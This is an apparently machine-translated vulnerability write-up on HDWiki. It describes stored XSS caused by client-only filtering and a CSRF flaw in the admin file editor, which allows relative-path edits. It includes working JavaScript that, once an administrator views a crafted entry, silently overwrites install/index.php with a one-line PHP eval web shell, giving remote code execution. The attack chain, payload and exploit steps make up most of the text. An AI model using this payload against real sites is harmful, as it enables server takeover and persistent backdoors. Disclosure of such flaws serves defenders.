Two major problems:I. When a front-end entry is created, the inserted content is only filtered by the client of editor's js for sensitive code. After the entry is passed into the server, the server side is not strictly filtered to form Xss. 2. When editing files in the background, there is no limit on the use of relative paths. You can directly edit files using relative paths (the files are displayed in the list as absolute paths by default ), in addition, the file location is not verified to form a CSRF.Use Getshell:(Common User) Front-end creation entry: release, packet capture modification: Insert a written JavaScript code here, and edit the install/index. php content as a one-sentence Trojan. The content is as follows:
function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; } var _x = ajax(); postgo(); function postgo() { src="http://127.0.0.1/hdwiki/index.php?admin_filemanager-edit"; data="fname=install%2Findex.php&dir=.%2F&content=%3C%3Fphp+eval%28%24_POST%5Bc%5D%29%3B%3F%3E&dosubmit=+%E7%A1%AE%E8%AE%A4%E4%BF%AE%E6%94%B9+"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false); if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.send(_a); return _x.responseText; }
Submit for release. (Administrator Account) log on to the backend: view the user-created entry: CSRF getshell: